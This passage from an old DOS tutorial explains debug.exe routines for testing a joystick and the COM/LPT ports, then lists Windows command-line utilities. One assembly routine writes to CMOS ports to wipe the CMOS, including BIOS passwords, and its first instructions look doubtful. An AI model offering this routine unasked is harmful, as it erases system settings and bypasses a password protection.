-xxxx:010c int 20
-xxxx:0110 (without typing anythiing)
-g
Program terminated normally.
-q

This test will test to see if your Joystick is present or not. Type debug from the DOS prompt once at the "-". Type i201 If you get a FF response attempt hold one of the main buttons on your joystick, and while holding the button down type i201 and see if a different response is given, each button on the joystick should return a different response. However, some special joysticks, such as the Microsoft Sidewinder, which has more than 4-5 buttons, may not return a response for all extra buttons because these buttons are generally controlled through software. If a FF is still given on each of the buttons on the game paddle or joystick, it is a good possibility that either the Joystick and or the Joystick port is bad. If possible, attempt these steps with another known working joystick. However, if you are receiving different responses when pressing and holding the keys on the joystick, the computer hardware is working properly. Type q and press enter to quit out of debug.

The below debug routine will clear CMOS, BIOS, Passwords, Settings, Viruses, and other items residing in the CMOS. During this process you may get returned characters which are an indication that the string has gone in, if you by chance get ERROR ensure that you have typed the line in correctly, if not retype. Ensure that you do not skip any lines, that it is ALL typed in correctly to help prevent problems. Before running this Debug routine also ensure that you have read the above disclaimer. After typing debug you will get "-" which is were you can begin by typing A and pressing enter. A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
Note: Nothing is typed on this line
G By pressing G this will execute the above script, ensure you have read and agree to the above disclaimer.
Q Then reboot and you will get a Setup Checksum Error. Go into setup, correct all the incorrect values, time, date...

The below debug routine will check the ports of the computer to allow you to know if ports are being detected or not. Type debug to get to the "-" Type D40:0
You should get several lines; however, the first line is the only important line, which should read the following:
0040:0000 F8 03 F8 02 E8 03 E8 02 - 78 03 78 02 BC 03
F8 03
F8 02
E8 03
E8 02


78 03
78 02
BC 03

COM1
COM2
COM3
COM4

LPT1
LPT2
LPT3

The above graph shows you what the feed back means as far as port, so if you see F8 03, this would be an indication that COM1 is being detected; if you see 00 00, this is an indication that it is not being detected, which could mean that hardware is bad or that it is disabled inCMOS
Once you have finished looking at the information, type Q and press enter to get out of Debug.

Debug has been included in every version of MS-DOS as well as Windows. When running any of the debug routines it is recommended that if you have Windows that you exit or shut down to get into a real DOS prompt (unless you're running Windows ME, Windows 2000, Windows XP, or later versions).

Once at the MS- DOS prompt, run through the below example, this example is perfectly fine to run on any PC Computer running MS-DOS / Windows and will not harm anything.
Type debug and press enter.
This should get you to a - (small dash). This is the debug prompt.
At the - type d40:00 and press enter; this will return several lines of information.
After the feedback you will be back to the debug prompt.
To exit out of debug type q and press enter. This will return you back to the MS-DOS prompt.

In some of the below debug routines you will notice that a "g" is typed, then "q". G tells the computer that the code type is not self executing and must be run at this point. If completed, the program will return Program Terminated Normally which indicates you can now quit from the debug program.

ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes

BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info

CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data

DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory

ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files

FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files
FOR /F Loop command: against the results of another command
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations

GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line

HELP Online Help
HFNETCHK Network Security Hotfix Checker

IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP

KILL Remove a program from memory

LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file

MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files

NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights

PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands

XCACLS Change file permissions
XCOPY Copy files and folders